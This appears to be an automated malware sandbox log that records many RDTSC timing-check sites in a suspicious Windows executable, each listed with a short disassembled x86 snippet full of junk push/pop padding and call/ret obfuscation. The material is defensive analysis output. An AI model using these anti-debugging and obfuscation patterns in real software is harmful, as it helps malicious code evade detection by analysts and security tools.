Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BF1A5 second address: 8BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F05F0F4975Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BF4BA second address: 8BF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BF5FE second address: 8BF602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BF602 second address: 8BF610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F05F0F594A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BF610 second address: 8BF616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8BFA05 second address: 8BFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F594A6h 0x0000000c jmp 00007F05F0F5949Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C2066 second address: 8C206B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C2172 second address: 8C21CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jno 00007F05F0F594ADh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F05F0F59498h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 add edi, dword ptr [ebp+122D2DF5h] 0x0000002f mov ecx, eax 0x00000031 jne 00007F05F0F59497h 0x00000037 cld 0x00000038 push 9AD9630Eh 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C21CD second address: 8C21E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C21E8 second address: 8C223A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 65269D72h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F05F0F59498h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D26A8h], ebx 0x00000030 push 00000000h 0x00000032 mov si, C0BAh 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D279Fh], esi 0x0000003e push 515D0900h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C223A second address: 8C223E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C22F3 second address: 8C2364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F05F0F59498h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push esi 0x00000028 call 00007F05F0F594A8h 0x0000002d mov di, bx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 sub esi, 0EA2B86Ch 0x0000003a mov dword ptr [ebp+122D27C9h], edx 0x00000040 push 2ACB4DFEh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F05F0F5949Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8C2364 second address: 8C243C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 jc 00007F05F0F49756h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 2ACB4D7Eh 0x00000018 sub dword ptr [ebp+122D27F4h], ebx 0x0000001e push 00000003h 0x00000020 push edx 0x00000021 mov dword ptr [ebp+122D35EBh], edx 0x00000027 pop ecx 0x00000028 push 00000000h 0x0000002a jne 00007F05F0F4975Ch 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F05F0F49758h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push 94BE2F36h 0x00000051 pushad 0x00000052 push esi 0x00000053 jmp 00007F05F0F49763h 0x00000058 pop esi 0x00000059 jmp 00007F05F0F49767h 0x0000005e popad 0x0000005f xor dword ptr [esp], 54BE2F36h 0x00000066 jl 00007F05F0F49756h 0x0000006c lea ebx, dword ptr [ebp+1244DF35h] 0x00000072 call 00007F05F0F49768h 0x00000077 or dword ptr [ebp+122D278Fh], edi 0x0000007d pop ecx 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push edi 0x00000082 jmp 00007F05F0F4975Bh 0x00000087 pop edi 0x00000088 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E2767 second address: 8E276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E28FC second address: 8E2900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E2900 second address: 8E2904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E2BDE second address: 8E2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E35EC second address: 8E35F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E3742 second address: 8E3746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E3746 second address: 8E3750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E3750 second address: 8E3781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F05F0F49760h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8D692F second address: 8D6969 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A5h 0x0000000c jmp 00007F05F0F5949Fh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jg 00007F05F0F59496h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8D6969 second address: 8D697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F05F0F49756h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8D697E second address: 8D69AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 jmp 00007F05F0F594A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8D69AC second address: 8D69B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B5AB6 second address: 8B5AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F05F0F59496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B5AC0 second address: 8B5AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnc 00007F05F0F49756h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B5AE8 second address: 8B5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05F0F59496h 0x0000000a pop esi 0x0000000b push edi 0x0000000c jnp 00007F05F0F59496h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B5AFF second address: 8B5B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B5B03 second address: 8B5B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E3FC0 second address: 8E3FE1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05F0F49756h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F05F0F4975Eh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E3FE1 second address: 8E3FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E4162 second address: 8E4199 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 pop ebx 0x00000009 jmp 00007F05F0F49764h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F05F0F4975Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E4199 second address: 8E41B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E41B6 second address: 8E41BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E41BC second address: 8E41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E4737 second address: 8E473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E473B second address: 8E4741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E4741 second address: 8E4749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E4749 second address: 8E474D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8E474D second address: 8E4751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EB6F6 second address: 8EB6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF6A3 second address: 8EF6BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F05F0F49756h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jp 00007F05F0F49756h 0x00000011 jno 00007F05F0F49756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EEEAF second address: 8EEEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF1E9 second address: 8EF1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F05F0F49756h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF346 second address: 8EF34A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF4E4 second address: 8EF4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Dh 0x00000009 js 00007F05F0F49756h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF4FB second address: 8EF537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F05F0F5949Ah 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jbe 00007F05F0F59496h 0x0000001f jmp 00007F05F0F594A2h 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8EF537 second address: 8EF53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F21AA second address: 8F220F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F05F0F59496h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1C44F466h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F05F0F59498h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007F05F0F594A0h 0x00000032 cld 0x00000033 push BD85BC10h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F05F0F594A5h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F27BD second address: 8F27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F2E87 second address: 8F2E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F2E8D second address: 8F2E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F2E91 second address: 8F2EA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F2EA3 second address: 8F2EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F3200 second address: 8F320F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F320F second address: 8F3229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F4B69 second address: 8F4B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F69C4 second address: 8F69C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F69C9 second address: 8F69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F7521 second address: 8F7525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F7525 second address: 8F752B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FDECF second address: 8FDED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FDED3 second address: 8FDF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F05F0F59498h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F05F0F59498h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+1247195Ch], ecx 0x00000033 push 00000000h 0x00000035 mov edi, esi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F05F0F59498h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov di, si 0x00000056 jmp 00007F05F0F594A1h 0x0000005b mov dword ptr [ebp+122D1F07h], ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F05F0F5949Ch 0x0000006a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FDF5E second address: 8FDF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FEDD7 second address: 8FEE25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F05F0F594A0h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 sub bl, FFFFFF81h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov esi, dword ptr [ebp+122D26FAh] 0x0000001f xor ebx, dword ptr [ebp+122D2FD1h] 0x00000025 popad 0x00000026 mov di, dx 0x00000029 push 00000000h 0x0000002b mov ebx, dword ptr [ebp+122D3977h] 0x00000031 mov di, dx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F05F0F5949Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FEE25 second address: 8FEE2F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FFEAE second address: 8FFEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 900F84 second address: 900F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 900F88 second address: 900F92 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 900F92 second address: 900FB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49762h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 900FB0 second address: 900FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 902F0F second address: 902F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 902F15 second address: 902F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FD1E4 second address: 8FD1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8FFFCA second address: 8FFFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9010D5 second address: 901138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+12460D09h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F05F0F49758h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edi, 61011093h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 cmc 0x00000041 mov eax, dword ptr [ebp+122D04F5h] 0x00000047 push FFFFFFFFh 0x00000049 pushad 0x0000004a sub dword ptr [ebp+124719C9h], ebx 0x00000050 popad 0x00000051 nop 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 js 00007F05F0F49756h 0x0000005b rdtsc
